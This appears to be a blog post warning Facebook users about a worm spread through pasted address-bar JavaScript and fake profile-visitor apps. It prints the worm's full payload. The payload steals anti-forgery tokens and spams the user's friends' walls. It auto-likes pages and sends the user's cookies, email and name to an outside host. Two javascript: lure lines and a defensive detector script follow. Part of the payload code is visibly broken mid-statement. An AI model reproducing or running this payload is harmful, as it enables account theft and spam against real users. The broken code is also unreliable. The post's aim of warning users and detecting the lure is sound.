The script that runs is JavaScript, mostly served as majic.js or as the index.php file; it will show a URL like http://www.imaginemonkeys.com/majic.js or http://imaginemonkeys.com/index.php


The code hidden inside the malicious script is shown below.


Code: 
//
//
txt = "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/";
txtee = "Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/";

alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");

with(x = new XMLHttpRequest())
open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 &amp;&amp; x.status == 200) {
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";
appname = "rip_m_j";

with(xx = new XMLHttpRequest())
open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&amp;filter=all&amp;__a=1&amp;__d=1"),
onreadystatechange = function () { if (xx.readyState == 4 &amp;&amp; xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
i = 0; llimit=25;
t = setInterval(function () {
if (i &gt;= llimit ) return;
if(i == 0) {
with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&amp;__d=1"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){ if(ddddd.readyState == 4 &amp;&amp; ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^&lt;&gt;]+)/)[1] + "&amp;c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=176607175684946&amp;add=1&amp;reload=1&amp;preserve_tab=1&amp;use_primer=1&amp;nctr[_mod]=pagelet_top_bar&amp;post_form_id="+pfid+"&amp;fb_dtsg=" + dt + "&amp;lsd&amp;post_form_id_source=AsyncRequest");
with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=150650771629477&amp;add=1&amp;reload=1&amp;preserve_tab=1&amp;use_primer=1&amp;nctr[_mod]=pagelet_top_bar&amp;post_form_id="+pfid+"&amp;fb_dtsg=" + dt + "&amp;lsd&amp;post_form_id_source=AsyncRequest");
with(llxlxlxlxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=109075015830180&amp;add=1&amp;reload=1&amp;preserve_tab=1&amp;use_primer=1&amp;nctr[_mod]=pagelet_top_bar&amp;post_form_id="+pfid+"&amp;fb_dtsg=" + dt + "&amp;lsd&amp;post_form_id_source=AsyncRequest");
} else if (i == llimit - 1) {
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){
if(xxxx.readyState == 4 &amp;&amp; xxxx.status == 200){
with(s = document.createElement("script")) src = "http://revolvingimages.info/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName"&gt;([^&lt;&gt;]+)/)[1] + "&amp;c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
if(i%2==0) {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&amp;profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&amp;status=" + txt + "&amp;target_id=" + m[Math.floor(Math.random() * m.length)] + "&amp;composer_id=" + comp + "&amp;hey_kid_im_a_composer=true&amp;display_context=profile&amp;post_form_id=" + form + "&amp;fb_dtsg=" + dt + "&amp;lsd&amp;_log_display_context=profile&amp;ajax_log=1&amp;post_form_id_source=AsyncRequest");
}
else {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&amp;profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&amp;status=" + txtee + "&amp;target_id=" + m[Math.floor(Math.random() * m.length)] + "&amp;composer_id=" + comp + "&amp;hey_kid_im_a_composer=true&amp;display_context=profile&amp;post_form_id=" + form + "&amp;fb_dtsg=" + dt + "&amp;lsd&amp;_log_display_context=profile&amp;ajax_log=1&amp;post_form_id_source=AsyncRequest"); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);


Some of the Websites you should not visit if you see below :
1. To stop it spamming your wall, simply re-generate your unique mobile email address at
     http://www.facebook.com/mobile/
2. Change your password, and also delete all your browser's cookies, browsing history & saved passwords.
3. Don't copy and paste JavaScript or any other unknown scripts into your browser again.
4. Most importantly, never click on unknown links; always check that your browser's URL bar
     shows https or http://www.facebook.com, not phishing or fake sites like http://www.faacebook or
     http://www.faceb00k.com.
5. Use a good security suite like AVG 2011 or Norton 2011 or any other, and always update
     its virus definitions and program components. These security suites have all types of security software
     built in, like antivirus, anti-spyware, anti-spam, anti-phishing, firewall & IDS etc.

6. Keep your operating system always updated, and also update all of your application software, like
    the browser itself.
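
The address-bar lure analyzed in this post has a recognizable shape, so text can be checked before it is pasted or allowed through a filter. The following is an added example, not part of the original post: it flags javascript: URIs and extracts the host of any remote script they load, using the two snippets quoted above as samples. The function name and the verdict strings are assumptions.

```javascript
// Added example, not part of the original post: classify text that a page
// asks the user to paste into the browser's address bar.

// The two address-bar snippets quoted in this post, used as sample input.
const SAMPLE_LURES = [
  'javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)',
  'javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)',
];

function analyzePastedText(text) {
  // URL parsers drop tabs and line breaks, so remove them before matching.
  const cleaned = String(text).replace(/[\t\r\n]/g, '').trim();

  // A javascript: URI runs with the privileges of the page that is open.
  const isJsUri = /^javascript:/i.test(cleaned);

  // The lure builds a <script> element and points its src at a remote host.
  const createsScript = /createElement\(\s*["']script["']\s*\)/i.test(cleaned);

  const hosts = [];
  const srcAssignment = /\.src\s*=\s*(["'])(.*?)\1/g;
  let match;
  while ((match = srcAssignment.exec(cleaned)) !== null) {
    try {
      // Resolve against a placeholder base so protocol-relative "//host/..."
      // values parse; a result still on the placeholder host is relative.
      const url = new URL(match[2], 'https://page.invalid/');
      if (url.hostname !== 'page.invalid' && !hosts.includes(url.hostname)) {
        hosts.push(url.hostname);
      }
    } catch (err) {
      // Unparseable src value: nothing to extract.
    }
  }

  return {
    isJsUri,
    loadsRemoteScript: createsScript && hosts.length > 0,
    hosts,
    verdict: isJsUri ? 'block' : 'allow',
  };
}

for (const lure of SAMPLE_LURES) {
  const result = analyzePastedText(lure);
  console.log(result.verdict, result.hosts.join(', '));
}
```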


So be cautious, guys, whenever you see comments like "Great, now we have such applications in Facebook", and never use these applications or accept their requests.


Two applications which I found popping up are See Who Has Visited Your Profile and Profile Privacy v1.2. Please remember that these are FAKE APPLICATIONS and use such comments on other users' walls to get them clicked or used.


I hope my post is helpful for all of you guys :) comments are welcome.